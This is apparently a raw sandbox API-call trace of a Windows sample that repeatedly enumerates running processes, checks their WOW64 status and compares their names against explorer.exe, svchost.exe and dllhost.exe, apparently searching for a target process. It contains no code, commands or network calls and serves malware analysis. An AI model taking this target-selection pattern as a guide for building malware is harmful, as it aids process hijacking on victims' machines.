lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0180.359] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0180.359] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0180.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0180.359] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.359] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.359] CloseHandle (hObject=0xec) returned 1 [0180.359] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0180.359] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0180.360] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0180.360] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0180.360] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0180.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0180.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0180.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0180.362] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0180.362] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0180.362] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0180.363] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.363] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.363] CloseHandle (hObject=0xec) returned 1 [0180.363] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0180.364] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.364] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.364] CloseHandle (hObject=0xec) returned 1 [0180.364] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0180.364] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0180.365] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.365] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.365] CloseHandle (hObject=0xec) returned 1 [0180.365] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0180.365] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0180.365] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.365] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.365] CloseHandle (hObject=0xec) returned 1 [0180.365] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.367] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0180.367] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.367] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.367] CloseHandle (hObject=0xec) returned 1 [0180.368] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0180.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0180.368] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.368] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0180.368] CloseHandle (hObject=0xec) returned 1 [0180.368] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0180.368] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0180.368] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0180.368] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0180.369] CloseHandle (hObject=0xe8) returned 1 [0180.369] Sleep (dwMilliseconds=0x3e8) [0181.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0181.376] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0181.376] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0181.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0181.377] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0181.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0181.377] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0181.378] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0181.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0181.378] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0181.379] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0181.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0181.379] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0181.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0181.380] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0181.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0181.380] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0181.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0181.381] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0181.381] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0181.382] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0181.382] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0181.383] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0181.383] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0181.384] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0181.384] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0181.385] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0181.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0181.385] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.385] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.385] CloseHandle (hObject=0xec) returned 1 [0181.385] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0181.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0181.386] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0181.386] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.386] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.386] CloseHandle (hObject=0xec) returned 1 [0181.386] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0181.387] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0181.387] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0181.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0181.388] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.388] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.388] CloseHandle (hObject=0xec) returned 1 [0181.388] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0181.388] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0181.388] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0181.388] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0181.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0181.389] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.389] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.389] CloseHandle (hObject=0xec) returned 1 [0181.389] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0181.389] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0181.389] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0181.389] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0181.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0181.389] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.389] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.389] CloseHandle (hObject=0xec) returned 1 [0181.389] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0181.389] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0181.389] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0181.389] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0181.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0181.390] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.390] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.390] CloseHandle (hObject=0xec) returned 1 [0181.390] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0181.390] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0181.390] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0181.390] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0181.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0181.391] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.391] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.391] CloseHandle (hObject=0xec) returned 1 [0181.391] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0181.391] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0181.391] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0181.391] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0181.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0181.391] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.391] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.392] CloseHandle (hObject=0xec) returned 1 [0181.392] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0181.392] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0181.392] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0181.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0181.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0181.392] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.392] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.392] CloseHandle (hObject=0xec) returned 1 [0181.392] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0181.392] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0181.392] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0181.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0181.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0181.393] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.393] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0181.393] CloseHandle (hObject=0xec) returned 1 [0181.393] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0181.393] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 